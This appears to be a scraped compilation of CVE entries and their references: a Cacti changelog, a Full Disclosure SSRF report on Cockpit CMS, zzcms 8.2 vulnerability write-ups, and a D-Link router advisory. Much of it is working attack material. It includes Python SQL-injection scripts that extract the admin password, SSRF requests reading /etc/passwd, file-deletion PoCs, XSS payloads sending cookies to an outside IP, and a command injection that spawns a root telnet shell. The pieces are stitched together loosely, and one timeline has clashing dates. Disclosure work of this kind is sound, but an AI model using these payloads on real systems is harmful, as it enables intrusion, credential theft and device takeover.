The script '/adminui/error_details.php' in the Quest KACE System Management Appliance 8.0.318 allows authenticated users to conduct PHP object injection attacks.

CVE-2018-11135

Cacti before 1.1.37 has XSS because it makes certain htmlspecialchars calls without the ENT_QUOTES flag (these calls occur when the html_escape function in lib/html.php is not used).

Type

ID

Text

feature

Add a Timeout setting for Remote Agent calls

feature

Add Graphs and Data Sources hyperlinks on Device page

feature

Add One Minute Sampling to the default Data Source Profiles

feature

Add support for DDERIVE and DCOUNTER to Cacti

feature

Add Timezone support for Remote Data Collectors

feature

Allow Adding Aggregate Graphs to a Report

feature

Allow ASCII filepath paths to not be found on settings save

feature

Allow drill down from Graphs to Data Queries or Templates

feature

Allow Import/Export to be hookable

feature

Allow snmpagent to be disabled for very large installs

feature

Allow Top tabs to be Glyphs or Text or both

feature

Big Spanish translation update plus massive QA fixes

feature

Change password page provides visible confirmation of password rules

feature

Do not allow second data source to be added to an SNMP Get data template

feature

Don't allow removal of Data Sources from Data Template once its in use

feature

Inform the primary Cacti administrator of problems by Email

feature

Make all user settings dynamic and allow resetting to default.

feature

Make Graph and Data Source suggested naming more efficient

feature

Make it easy to find Data Query based graphs that have lost indexes

feature

Make Top Tabs use Ajax Callback

feature

Make tree editing responive

feature

New Install/Upgrade user permission to limit access to being able to upgrade

feature

Provide option to debug width errors where output exceeds column width

feature

Removed the Authentication Method of 'None'

feature

Tree automation is now defaulted to on for new install

feature

Update JavaScript library c3.js to version 0.6.8

feature

Update JavaScript library Chart.js to 2.7.3

feature

Update JavaScript library d3.js to version 5.7.0

feature

Update JavaScript library jquery.js to 3.3.1

feature

Update JavaScript library jquery-migrate.js to 3.0.1

feature

Update JavaScript library jquery.tablesorter.js to version 2.30.7

feature

Update JavaScript library jstree.js to 3.3.7

feature

Update JavaScript library screenfull.js to 3.3.3

feature

Update phpmailer to version 6.0.6

feature

Update phpseclib to version 2.0.13

feature

289

Allow external nologin access for Realtime Graphs

feature

553

When display a host, include Aggregated Graphs as well as standard graphs

feature

614

Allow users to duplicate Data Input Methods

feature

973

When creating a new user authenticated via LDAP, attempt to retrieve users email and full name

feature

122

Support a Site Branch Type

feature

1060

Design Enhancement for Large scale Cacti Implementations

feature

1142

Add Site dropdown to the Graphs and Data Source pages

feature

1184

Improve Data Input Methods editability and message handling

feature

1200

Aggregate Graphs can now include COMMENT

feature

1282

Email notification for Automation Network discovery process

feature

1347

Update automation logging to work better

feature

1395

Ensure messages have each new line keep the same prefix in cacti\_log()

feature

1399

Allow 'requires' to include version against a plugin

feature

1400

User settings are now dynamic and can be reset (removed) to return to global settings

feature

1422

Automatically select the next unused data input field when clicking add on data input method

feature

1505

When displaying a graph, provide breadcrumb link to edit device

feature

1527

Update Fontawesome from 4.7 to 5.0.10

feature

1580

Support Drag & Drop for Builtin Report Items

feature

1581

Allow Mass Adding of Graphs to Reports

feature

1584

Allow theme selection when installing

feature

1588

Check that PHP can run a test file

feature

1593

Allow External links to auto refresh

feature

1597

Ensure synchronised files have same attributes as originals

feature

1610

On Unix, redirect error messages to log files when running external scripts

feature

1628

Allow the User to define an initial Automation Network for discovery when installing

feature

1670

Improve Graph Management to show type of source for a graph

feature

1671

When duplicating a Graph Template, properly duplicate Data Query Graph Template Mappings

feature

1677

Default Tree nodes sorting to be inherited

feature

1691

On Graph context menu, add a 'Copy graph' option to copy graph image

feature

1692

Separate option for logging Input Validation issues

feature

1703

On Graph context menu, text is now multi-lingual

feature

1708

Allow the User to override global Automation email recipients at the Automation Network level

feature

1709

Suppress warning from RRDTool when attempting to make updates in the past

feature

1711

Add support for SSL connections to MySQL

feature

1731

Prevent loss of changes by warning user about unsaved items

feature

1734

When displaying a graph, provide more information when error image is displayed (see also #1428)

feature

1763

Enable automatic refresh for Time Graph View

feature

1806

Control low level debug routines via config.php (Develoepr Use)

feature

1819

Provide CLI program to enable graphs to be removed by scripts

feature

1969

Graph previews can now be linked using a host's external id

feature

2006

Introduce new Data Source Profile to handle decade long graphs

feature

2173

Introduce Device and Graph Template Caching to Speed UI

feature

2228

Add Device ID to Device search field

issue

Fix issue with display\_custom\_error\_message() causing problem with system error message handling

issue

Graph List View was not fully responsive

issue

Move Graph removal function to Graph API

issue

On the Data Sources page, if there is no filtered Device and a Data Source is edited, device association is lost

issue

Typo in Dutch translations when an error occurred while downgrading

issue

Unable to display user profile tabs

issue

Verify all Fields not working due to Cacti 1.x upgrade error

issue

186

Cacti does not support jQueryUI 1.12.x

issue

187

Remove the use of jQuery Migrate plugin

issue

948

Do not create a new datasource when adding a new Graph for the same device/field

issue

454

Cacti Re-Index does not resolve index changes properly during re-index

issue

983

Import Template Preview is misleading

issue

1097

When copying template user, newly created user should always be enabled to allow logging in

issue

1097

When copying template user, it should be disable to prevent logging in as template user directly

issue

1174

When display a tree, disable drag and drop unless in edit mode

issue

1298

Display fatal error to prevent issues caused when system log is not writable

issue

1350

When switching an Automation Tree Rule's leaf type, remove invalid Automation Rule Items

issue

1383

CSRF Timeout does not obey session timeout

issue

1408

Update SQL / Backtrace to use new clean\_up\_lines() function

issue

1414

DSSTATS reports incorrectly that a data source does not exist

issue

1420

Fix issues found by Debian package builds

issue

1421

Fix issue when SQL had all bad modes, missing variable warning was generated

issue

1426

Fix issue where remote poller was not using unique filenames when attempting to verify files

issue

1437

Plugin install hover message sometimes shows line breaks rather than formatted text

issue

1454

When using oid\_regexp\_parse, filter indexes to those that match

issue

1473

Recovery Date overwritten by subsequent checks

issue

1494

Unable to Deep Link/Bookmark Trees

issue

1503

Undefined function clearstatscache in DSSTATS

issue

1507

When saving graph settings from the graph page, the graph template id should not be included

issue

1510

New Graphs Undefined Variable $graph\_template\_name

issue

1521

Force boost to be enabled when there are Remote Data Collectors

issue

1528

Saving a device can result in WARNINGS related to string vs array handling

issue

1529

Allow Aggregate Graphs to Sum Bandwidth and Percentile COMMENTS

issue

1543

Graph Preview appends header=false too many times

issue

1553

Poller does not set rrd\_step\_counter correctly if no steps taken

issue

1559

CLI Output Issues due to over escaping

issue

1560

Warning that escapeshellarg() is escaping a null

issue

1567

Technical support - add notification if Cacti and Spine version is different

issue

1574

User templates are not correctly being applied

issue

1589

Installer now checks that the temporary folder is writable

issue

1590

User Admin generates SQL error if user is not part of any groups

issue

1601

Aggregate Graphs can not include some classes of COMMENT

issue

1602

PHP ERROR: Call to undefined function api\_data\_source\_cache\_crc\_update()

issue

1604

Failed to connect to remote collector

issue

1606

Boost debug log not functional

issue

1607

Boost next run time occurs in the past

issue

1608

Possible boost race conditions

issue

1609

Remote pollers update 'stats\_poller' on main poller

issue

1617

Editing a data query results in missing $header variable

issue

1621

Realtime Popup can cause automatic logout

issue

1626

httpd-error.log have message about Fontconfig

issue

1634

Default snmp quick print setting resulting in false poller ASSERTS on some php releases

issue

1651

Check temporary folder has write access during import

issue

1655

Correct Cacti to handle new MySQL 8.0 reserved word \`system\`

issue

1658

Devices drop down should be filtered by Site

issue

1660

Reports based upon Tree don't maintain graph order

issue

1665

Must change password not working for local users when main realm is not local

issue

1669

Console log header grammar issue

issue

1674

Threads and Processes values not migrated to Poller table during upgrade

issue

1676

Allow automation discovery to add the same sysname on different hosts

issue

1682

Slow Select Statement lib/api\_automation.php

issue

1689

Technical Support's RRDTool version should show detected RRD version

issue

1690

Report a warning if the default collation is not utf8mb4\_unicode\_ci

issue

1700

Mail sent without auth causes errors to appear in logs

issue

1710

RRDtool create command causes first update to fail

issue

1721

Console Side Bar not correct on first login

issue

1723

die() messages should include PHP\_EOF for better logging

issue

1726

Poor page performance editing a Graphs Graph Items

issue

1746

Poller with no hosts does not exit until timeout is reached

issue

1761

Graph Management page shows bogus template names

issue

1783

Browser Back button still does not working

issue

1796

Import: Fixed handling of references to objects not included in file

issue

1799

Default User log sort should be date descending

issue

1810

Correct SQL errors with authentication set to no authentication

issue

1839

Dummy cosmetic bug on down device selection option

issue

1841

Data Source Stats table not properly migrated from pre 1.x Cacti plugin

issue

1849

SNMPAgent not sending traps

issue

1852

Reports Preview/Mails show no graphs

issue

1889

Insecure $ENV{ENV} which running setgid

issue

1901

Upgrade from 0.8.8h fails on external\_links statement

issue

1921

Data Query XML field method 'rewrite\_index' does not correctly query for value

issue

1926

Deselecting items should present warning or disable GO button

issue

1948

Device Template should warn about need to re-sync

issue

1953

set\_default\_action() should warn if more than one action provided

issue

1973

SpikeKill Menu does not display properly

issue

1976

Default admin permissions do not allow everything

issue

1982

Certain hooks should occur within api functions rather than UI functions

issue

2002

api\_plugin\_db\_table\_create should support non-string defaults

issue

2012

For kernel 3.2+, "Linux - Memory - Free" should grep for "MemAvailable:", not "MemFree:"

issue

2085

CLOG Regex Parser does not verify registered function exists

issue

2126

api\_device.php generates undefined function poller\_push\_to\_remote\_db\_connect()

issue

2127

Unable to save error when duplicating graph

issue

2135

api\_tree\_lock() and api\_tree\_unlock() forcing redirection incorrectly

issue

2143

export.php Illegal string offset 'method'

issue

2144

Device Management "Status" column does not sort properly

issue

2152

When editing a device, should show disable/enable option

issue

2153

Utilities page issues the wrong hook for tabs

issue

2163

LDAP functions are not consistent

issue

2164

Login page does not remember selected realm

issue

2171

datepicker and timepick translation not available

issue

2178

Header/Footer included more than once

issue

2182

Graph View missing 'html\_graph\_template\_multiselect()' function

issue

2184

html\_host\_filter() does not handle host\_id consequently

issue

2186

Boost generates invalid SQL during on demand update

issue

2188

SNMP timeout errors are being duplicated

issue

2191

i18n\_themes is not properly primed in global\_arrays.php

issue

2202

Can't create more than one graph with add\_graphs.php from one template

issue

2207

Removing Graph Template does not Remove Data Query Associations

issue

2217

cmd.php not handling quoted snmp values properly

issue

2240

SNMP system Data Input Methods should not be modified on import

issue

2241

Spike removal not functional due to Debian packaging

security

1072

Prevent exploitation of Data Input Methods to escalate privileges (CVE-2009-4112)

security

1882

Bypass output validation in select cases

security

2212

Stored XSS in "Website Hostname" field

security

2213

Stored XSS in "Website Hostname" field - Devices

security

2214

Stored XSS in "Vertical Label" field - Graph

security

2215

Stored XSS in "Name" field - Color

unknown

CVE-2018-10061: The Complete RRDTool-based Graphing Solution

SSRF (Server Side Request Forgery) in Cockpit 0.13.0 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter, related to use of the discontinued aheinze/fetch_url_contents component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: "service () baimaohui net" <service () baimaohui net>  
_Date_: Wed, 4 Apr 2018 20:50:10 +0800  

\# SSRF（Server Side Request Forgery） in Cockpit CMS 0.13.0 (CVE-2017-14611)

The Cockpit CMS is awesome if you need a flexible content structure but don't want to be limited in how to use the 
content.

## Product Download: https://getcockpit.com/

## Vulnerability Type：SSRF（Server Side Request Forgery）

## Attack Type : Remote

## Vulnerability Description

Cockpit CMS uses a \`fetch\_url\_contents\` （https://github.com/aheinze/fetch\_url\_contents）project code on github website, 
This Project has SSRF Vulnerability，So affect the system.

The vulnerability code（/assets/lib/fuc.js.php）:

    if (isset($\_REQUEST\['url'\])) {

        // allow only query from same host
        echo(parse\_url($\_SERVER\['HTTP\_REFERER'\],PHP\_URL\_HOST));
    
        if ($\_SERVER\['HTTP\_HOST'\] != parse\_url($\_SERVER\['HTTP\_REFERER'\], PHP\_URL\_HOST)) {
            header('HTTP/1.0 401 Unauthorized');
            return;
        }
    
        $url     = $\_REQUEST\['url'\];
        $content = '';
    
        if (function\_exists('curl\_exec')){
            $conn = curl\_init($url);
            curl\_setopt($conn, CURLOPT\_SSL\_VERIFYPEER, true);
            curl\_setopt($conn, CURLOPT\_FRESH\_CONNECT,  true);
            curl\_setopt($conn, CURLOPT\_RETURNTRANSFER, 1);
            curl\_setopt($conn,CURLOPT\_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like 
Gecko) Chrome/24.0.1312.52 Safari/537.17');
            curl\_setopt($conn, CURLOPT\_AUTOREFERER, true);
            curl\_setopt($conn, CURLOPT\_FOLLOWLOCATION, 1);
            curl\_setopt($conn, CURLOPT\_VERBOSE, 0);
            $content = curl\_exec($conn);
            curl\_close($conn);
        }
        if (!$content && function\_exists('file\_get\_contents')){
            $content = @file\_get\_contents($url);
        }
        if (!$content && function\_exists('fopen') && function\_exists('stream\_get\_contents')){
            $handle  = @fopen ($url, "r");
            $content = @stream\_get\_contents($handle);
        }
    
        if (!$content) {
            header('HTTP/1.0 503 Service Unavailable');
        }
    
        return print($content);
    }


## Exploit

    GET /assets/lib/fuc.js.php?url=dict://127.0.0.1:3306 HTTP/1.1
    Host: 127.0.0.1
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 
Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\*/\*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8
    referer:http://127.0.0.1/index.php

modify the above url parameter，example，file:

request http(s) protocol: url=http(s)://www.google.com

file read：url=file:///etc/passwd or url=file:///c:/windows/win.ini

If the curl function is available,then use gopher、tftp、http、https、dict、ldap、file、imap、pop3、smtp、telnet protocols 
method，if not then only use http、https、ftp protocol

scan prot,example: url=dict://127.0.0.1:3306 
use gopher protocol: url=gopher://127.0.0.1:3306 

If the curl function is unavailable,this vulnerability trigger need allow\\\_url\\\_fopen option is enable in 
php.ini，allow\\\_url\\\_fopen option defualt is enable.

## Versions

Cockpit 0.13.0

## Impact

SSRF(Server Side Request Forgery) in Cockpit 0.13.0 version allow remote attackers to arbitrary files read，scan network 
port，information detection,internal network server attack.

## Credit

This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang &  National Computer Network Emergency Response 
Technical Team/Coordination Center of China (CNCERT/CC)

## References

CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14611

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **SSRF（Server Side Request Forgery） in Cockpit CMS 0.13.0 (CVE-2017-14611)** _service () baimaohui net (Apr 06)_

CVE-2017-14611: SSRF（Server Side Request Forgery） in Cockpit CMS 0.13.0 (CVE-2017-14611)

An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in a dl/dl_sendsms.php request.

**/dl/dl\_sendsms.php****Edition**

zzcms 8.2

**Location**

/dl/dl_sendsms.php

**Code**

$sql2=$sql." order by id asc limit $n,$size";

**Rows:73****Harm**

can get password through SQL injection

Cause the cause Take a look at the logic of the bug,If the POST request is not empty, the $sql value will be equal to $\_POST\["sql"\], $sql will be assigned to $sql2, $sql2=$sql." order by id asc limit $n,$size";

$sql not added ' ' This will cause SQL inject

 

Construct payload verification

sql=select email from zzcms\_dl where id=-1 union select group\_concat(distinct table\_name) from information\_schema.columns where table\_schema=database()#

 

**poc**

import requests
import string


url = "http://192.168.199.23/dl/dl\_sendmail.php"
cookies = {
'UserName':'1234','PassWord':'81dc9bdb52d04dc20036dbd8313ed055'}
flag = ''

data = {
     'sql':'select email from zzcms\_dl where id=-1 union select pass from zzcms\_admin #'
   }

r = requests.post(url,data,cookies=cookies)
r.encoding = 'utf-8'
print(r.text)

\[6\]

Get the administrator password

 \[6\]: ./images/6.png "6"

CVE-2018-9309: vulnerability/dl_sendsms.php.md at master · lihonghuyang/vulnerability

An issue was discovered in zzcms 8.2. user/manage.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg or oldflv parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

title

tags

grammar\_cjkRuby

manage.php

bug

true

**/user/manage.php****Edition :**

zzcms 8.2

**Location**

/user/manage.php

**Code:**

if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
	$f\="../".$oldimg;
	if (file\_exists($f)){
	unlink($f);
	}
	$fs\="../".str\_replace(".","\_small.",$oldimg);
	if (file\_exists($fs)){
	unlink($fs);		
	}
}
if ($oldflv<>$flv){
	$f\="../".$oldflv;
	if (file\_exists($f)==true){
	unlink($f);
	}
}

**Rows : 61****Harm**

Allows attackers to delete files arbitrarily

**Cause the cause**

First analyze the code, the first condition is action=modify

Satisfaction condition, must make the judgment of founderr=1, that is to say, must make content not empty

In this case, direct control of the data in **oldimg** or **oldflv**. POST ,then value can be achieved.

**poc**

An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.

**Solution**

Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes

CVE-2018-8968: vulnerability/manage.php.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. user/licence_save.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

title

tags

grammar\_cjkRuby

licence\_save.php

bug

true

**user/licence\_save.php****Edition :**

zzcms 8.2

**Location**

/user/licence_save.php

**Code:**

if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
			$f\="../".$oldimg;
			if (file\_exists($f)){
			unlink($f);
			}
			$fs\="../".str\_replace(".","\_small.",$oldimg)."";
			if (file\_exists($fs)){
			unlink($fs);		
			}
		}

**Rows : 31****Harm**

Allows attackers to delete files arbitrarily

**Cause the cause**

Through the code can know that we only control oldimg, and it did not carry out the appropriate filtering

first create test.php

Then perform the operation, remember to meet $oldimg<>$img && $oldimg<>"/image/nopic.gif"

Then execute

Then find test.php is gone

**poc**

GET:
http://127.0.0.1:8080/user/licence\_save.php?action=modify
POST:
id=11&oldimg=test.php&img=1231

An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.

**Solution**

Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes

CVE-2018-8969: vulnerability/licence_save.php.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in an adv2.php?action=modify request.

Permalink

Cannot retrieve contributors at this time

title

tags

grammar\_cjkRuby

adv2.php

新建,模板,小书匠

true

**/user/adv2.php****Edition :**

zzcms 8.2

**Location**

/user/adv2.php

**Code:**

$rs=query("select * from zzcms_ad where id=".$_POST["id"]."");

**Rows : 72****Harm**

Can get password through SQl injection

**Cause the cause**

Take a look at the logic of the bug, first slowly back up and found that need to enter here first and need to make a, c not all 0

That is to say, let **zzcms\_main** or **zzcms\_zh** have a value. Adding it directly tells the user that they do not have permission.In this case, directly POST

Then go back and find that need to let action=modify

At this point , first debug it, directly in phpstorm debugging id=0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=50,sleep(5),0), found that there really is Delay.

**poc**

import requests
import string
s = requests.session()
url = "http://127.0.0.1:8080/user/adv2.php?action=modify"
cookies = {
'UserName':'test2'
}
flag = ''
for i in range(1,40):
 for j in range(33,125):
   data = {
     'id':'0 or if((select ascii(substr(pass,{},1)) from zzcms\_admin)={},sleep(3),0)'.format(i,j)
   }
   #print data
   r = s.post(url,data=data,cookies=cookies)
   #print r.text
   sec=r.elapsed.seconds
   #print i,j,sec
   if sec >2:
     flag += chr(j)
     print flag
     break
print flag

Get the administrator password

CVE-2018-8967: vulnerability/adv2.php.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. It allows PHP code injection via the siteurl parameter to install/index.php, as demonstrated by injecting a phpinfo() call into /inc/config.php.

Permalink

Cannot retrieve contributors at this time

title

tags

grammar\_cjkRuby

install

bug

true

**Edition :**

zzcms 8.2

**Location**

/install/index.php

**Code:**

$str=str_replace("define('siteurl','".siteurl."')","define('siteurl','$url')",$str) ;

**Rows : 114****Harm**

Website information leaked

**Cause the cause**

The parameters here will be stored in /inc/config.php, so if I construct the corresponding statement, close the brackets, so that i can successfully perform sql injection.Due to waf reasons, only can control **siteurl**

Write siteurl=1');phpinfo();#

The discovery can be performed, due to the need to verify the database information before, so the use of the premise is that the install directory is not deleted, and should guess the database user name password

**poc**

**str** Parameter result：

finally successful

CVE-2018-8966: vulnerability/install.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. user/ppsave.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

title

tags

grammar\_cjkRuby

ppsave.php

bug

true

**/user/ppsave.php****Edition :**

zzcms 8.2

**Location**

/user/ppsave.php

**Code:**

if ($oldimg<>$img && $oldimg<>"image/nopic.gif") {
	//deloldimg
		$f\=$oldimg;
		if (file\_exists($f)){
		unlink($f);		
		}
		$fs\=str\_replace(".","\_small.",$oldimg);
		if (file\_exists($fs)){
		unlink($fs);		
		}

**Rows : 68****Harm**

Allows attackers to delete files arbitrarily

**Cause the cause**

First analyze the code, the first condition is action=modify

There is no other previous condition, just can directly control oldimg

**poc**

An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.

**Solution**

Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes

CVE-2018-8965: vulnerability/ppsave.php.md at master · Ni9htMar3/vulnerability

OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.

**0x00 Product Description**

Dlink is a multinational networking equipment manufacturing corporation.

The Dlink 860L/865L/868L/880L are wireless "Cloud" Router.

The vulnerabilities details are as follows:

Vendor: D-Link

Devices: DIR-880 REVA / DIR-868 REVA / DIR-865 / DIR-860 REVA

Firmware:

DIR-880L\_REVA\_FIRMWARE\_PATCH\_1.08B04

DIR868LA1\_FW112b04

DIR-865L\_REVA\_FIRMWARE\_PATCH\_1.08.B01

DIR860LA1\_FW110b04

**0x01 Vulnerabilities Summary**

The Dlink 860L/865L/868L/880L is a router overall badly designed with a lot of vulnerabilities.

My research in analyzing the security of Dlink routers starts from a recent security contest organized by a security company.

**0x02 The summary of the vulnerabilities is:**

1.  WAN && LAN - revA/B - XSS - CVE-2018-6527, CVE-2018-6528, CVE-2018-6529
2.  LAN - revA/B - OS command injection - CVE-2018-6530

**0x03 Details - WAN && LAN - revA/B - XSS**

After analyzing PHP files inside /htdocs/webinc, I found several trivial XSS vulnerabilities.

An attacker can use the XSS to target an authenticated user in order to steal the authentication cookies.

1.  xss inside /htdocs/webinc/body/bsc\_sms\_send.php

\[…\]
                <span class="value">
                        <input id="receiver" type="text" size="50" maxlength="15" value="<? echo $\_GET\["receiver"\]; ?>"/>
                </span>
\[…\]

An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/bsc\_sms\_send.php?receiver="><script>window.open('http://9.9.9.9:9999/cookie.asp?msg='+document.cookie)</script><"

2.  xss inside /htdocs/ webinc/js/adv\_parent\_ctrl\_map.php

\[…\]
                var msgArray =
                \[
                        '<?echo i18n("You have successfully configured your router to use OpenDNS Parental Control.");?>',
                        '<?echo i18n("Do you want to test the function?");?>',
                        '<p><input type="button" value="<?echo i18n('Test');?>" onclick="window.open(\\'http://www.opendns.com/device/welcome/?device\_id=<? echo $\_GET\["deviceid"\];?>\\')" /\><input type\="button" value\="<?echo i18n('Return');?>" onClick\="self.location.href=\\'adv\_parent\_ctrl.php\\';" /></p\>'
                \];
                BODY.ShowMessage('<?echo i18n("OpenDNS PARENTAL CONTROLS");?>', msgArray);
\[…\]

An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/adv\_parent\_ctrl\_map.php?deviceid=whatever\\');window.open(\\'http://9.9.9.9:9999/cookie.asp?msg=\\'+document.cookie

3.  xss inside /htdocs/ webinc/js/bsc\_sms\_inbox.php

\[…\]
        InitValue: function(xml)
        {
                var get\_Treturn = '<?if($\_GET\["Treturn"\]=="") echo "0"; else echo $\_GET\["Treturn"\];?>';		
         … 
        }
\[…\]

An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/bsc\_sms\_inbox.php?Treturn=0';window.open('http://9.9.9.9:9999/cookie.asp?msg='+document.cookie);get\_Treturn='1

**0x04 Details - LAN - revA/B - Command injection in SOAP controlType url interface**

The vulnerability occurs in /htdocs/cgibin which is executed by the web server for, just handles almost http requests from WAN and LAN, and my research in analyzing SOAP interface started from a security analysis report regarding UPNP protocol, then I reviewed the SOAP interface, which is handled by the soapcgi\_main function in cgibin, seems to have been mostly overlooked.

It should be noted that you could insert and execute malicious commands without privilege, meanwhile the injection point is the service field which is passed to soap.cgi to indicate control type, this exploitation also works even if invalid SOAPAction and whatever XML stream in a request.

Here’s the code in C to show some details about this issue:

/\* Grab a pointer to the request url \*/
requri \= getenv("REQUEST\_URI");
/\* goto failure if the urquri does not start with "?service=" \*/
if((query \= strchr(requri, "?")) \== NULL or strncmp(query, "?service=", strlen("?service=")))
{
    goto failure\_condition;
}
/\* Point the control type field pointer 9 bytes beyond the requri \*/ 
controlType \= query + strlen("?service=");

... ...

/\* Create/open a shell script using the specified control type string \*/
sprintf(filename, "%s/%s\_%d.sh", "/var/run", controlType, getpid());
fn \= fopen(filename "a+");
/\* Write self-deleting command into the srcipt and execute it by "sh -c"\*/
if(fn)
{
    fprintf(fn, "rm -f %s/%s\_%d.sh", "/var/run", controlType, getpid());
    fclose(fn);
    sprintf(filename, "%s/%s\_%d.sh", "/var/run", controlType, getpid());
    system(filename);
}

Proof of concept:

    POST /soap.cgi?service=whatever-control;iptables -P INPUT ACCEPT;iptables -P FORWARD ACCEPT;iptables -P OUTPUT ACCEPT;iptables -t nat -P PREROUTING ACCEPT;iptables -t nat -P OUTPUT ACCEPT;iptables -t nat -P POSTROUTING ACCEPT;telnetd -p 9999;whatever-invalid-shell HTTP/1.1
    Host: 192.168.100.1:49152
    Accept-Encoding: identity
    Content-Length: 16
    SOAPAction: "whatever-serviceType#whatever-action"
    Content-Type: text/xml
    
    whatever-content
    
    Here, we can easily build a soap http request and embed malicious command that spawns a telnet server on WAN that provides an unauthenticated root shell into it, and then login into router using telnet:
    $ telnet 192.168.0.1 9999
    Trying 192.168.0.1...
    Connected to 192.168.0.1.
    Escape character is '^]'.
    

**0x05 Report Timeline**

Dec 8, 2017: Vulnerabilities found.

Jul 18, 2018: Reported to security@dlink.com.

Jul 18, 2018: The vendor followed up and made a schedule to fix it.

Feb 1, 2018: Reported those security issues to MITRE.

Feb 1, 2018: MITRE provides CVE-2018-6527, CVE-2018-6528, CVE-2018-6529, CVE-2018-6530.

Mar 1, 2018: The vendor release security announcement for customers.

Mar 2, 2018: I decide to make a public disclosure.

**0x06 Credits**

These vulnerabilities were found by Kaixiang Zhang.

**0x07 References****DIR-880L RevA**

Release Notes - ftp://ftp2.dlink.com/SECURITY\_ADVISEMENTS/DIR-880L/REVA/DIR-880L\_REVA\_FIRMWARE\_PATCH\_NOTES\_1.08B06\_EN\_WW.pdf

Firmware - ftp://FTP2.DLINK.COM/SECURITY\_ADVISEMENTS/DIR-880L/REVA/DIR-880L\_REVA\_FIRMWARE\_PATCH\_v1.08B06\_BETA.zip

**DIR-865L RevA**

Release Notes - ftp://ftp2.dlink.com/SECURITY\_ADVISEMENTS/DIR-865L/REVA/DIR-865L\_REVA\_FIRMWARE\_PATCH\_NOTES\_1.10B01\_EN\_WW.pdf

Firmware - ftp://FTP2.DLINK.COM/SECURITY\_ADVISEMENTS/DIR-865L/REVA/DIR-865L\_REVA\_FIRMWARE\_PATCH\_v1.10B01\_BETA.zip

**DIR-868L RevA**

Release Notes - ftp://ftp2.dlink.com/SECURITY\_ADVISEMENTS/DIR-868L/REVA/DIR-868L\_REVA\_FIRMWARE\_PATCH\_NOTES\_1.20B01\_EN\_WW.pdf

Firmware - ftp://FTP2.DLINK.COM/SECURITY\_ADVISEMENTS/DIR-868L/REVA/DIR-868L\_REVA\_FIRMWARE\_PATCH\_v1.20B01\_BETA.zip

**DIR-860L RevA**

Release Notes - ftp://ftp2.dlink.com/SECURITY\_ADVISEMENTS/DIR-860L/REVA/DIR-860L\_REVA\_FIRMWARE\_PATCH\_NOTES\_1.11B01\_EN\_WW.pdf

Firmware - ftp://FTP2.DLINK.COM/SECURITY\_ADVISEMENTS/DIR-860L/REVA/DIR-860L\_REVA\_FIRMWARE\_PATCH\_v1.11B01\_BETA.zip

CVE-2018-6530: GitHub - soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto: 日前我发现了D-Link DIR 880L/865L/868L/860L路由器存在多个XSS和命令注入漏洞，最主要的问题是路由器未对用户输入进行检查，导致恶意数据请求被执行，最终被远程攻击者控制整个设备。

Tag

#php